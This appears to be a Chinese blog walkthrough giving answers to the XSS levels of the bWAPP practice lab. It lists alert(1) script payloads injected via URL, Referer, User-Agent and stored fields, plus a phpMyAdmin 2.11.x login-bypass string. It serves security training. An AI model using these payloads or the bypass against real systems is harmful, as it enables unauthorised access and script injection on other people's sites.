前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Bwapp漏洞平台答案全解-A3(第二篇)

Bwapp漏洞平台答案全解-A3(第二篇)

作者头像
用户1467662
发布2018-03-29 18:39:49
2.1K0
发布2018-03-29 18:39:49
举报
文章被收录于专栏:农夫安全

前言

接上篇XSS,没啥好讲的,直接看答案吧

A3 - Cross-Site Scripting (XSS)

-3.11-XSS - Reflected(phpMyAdmin)

这个看文档说是phpmyadmin上的一个BBcode的XSS,具体没复现过。

CVE-2010-4480

补充:

PHPmyadmin 2.11.3和2.11.4万能密码漏洞

只需要输入账号 密码不需要输入

利用代码如下:‘localhost’@'@”

3.12-XSS - Reflected (PHP_SELF)

用户名注入:<script>alert(1)</script>

密码注入:<script>alert(1)</script>

URL注入:

http://172.16.0.225/bWAPP/xss_php_self.php/"><script>alert(1)</script>

3.13-XSS - Reflected (Referer)

URL:

http://192.168.0.155/bWAPP/xss_referer.php

手动添加referer可以造成跨站

Referer: http://www.google.com/search?q=<script>alert(1)</script>

3.14-XSS - Reflected (User-Agent)

URL:

http://192.168.0.155/bWAPP/xss_user_agent.php

3.15-XSS – Stored (Blog)

直接在留言板处输入

<script>alert(1)</script>

3.16-XSS - Stored (Change Secret)

问题参数在bee

这个是在源码里面会有输出bee

所以我们可以抓包修改

3.17-XSS - Stored (Cookies)

XSS代码插入在了set-cookie里面,看自己怎么构造

3.18-XSS - Stored (SQLiteManage)

URL:

" >http://172.16.88.250/sqlite/?5e57f"><script>alert(1)</script>

3.19-XSS - Stored (User-Agent)

以为页面有回显user-agent的值

在页面抓包:

将user-agent改成<script>alert(1)</script>

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-07-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • A3 - Cross-Site Scripting (XSS)
    • -3.11-XSS - Reflected(phpMyAdmin)
      • 3.12-XSS - Reflected (PHP_SELF)
        • 3.13-XSS - Reflected (Referer)
          • 3.14-XSS - Reflected (User-Agent)
            • 3.15-XSS – Stored (Blog)
              • 3.16-XSS - Stored (Change Secret)
                • 3.17-XSS - Stored (Cookies)
                  • 3.18-XSS - Stored (SQLiteManage)
                    • 3.19-XSS - Stored (User-Agent)
                    领券
                    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档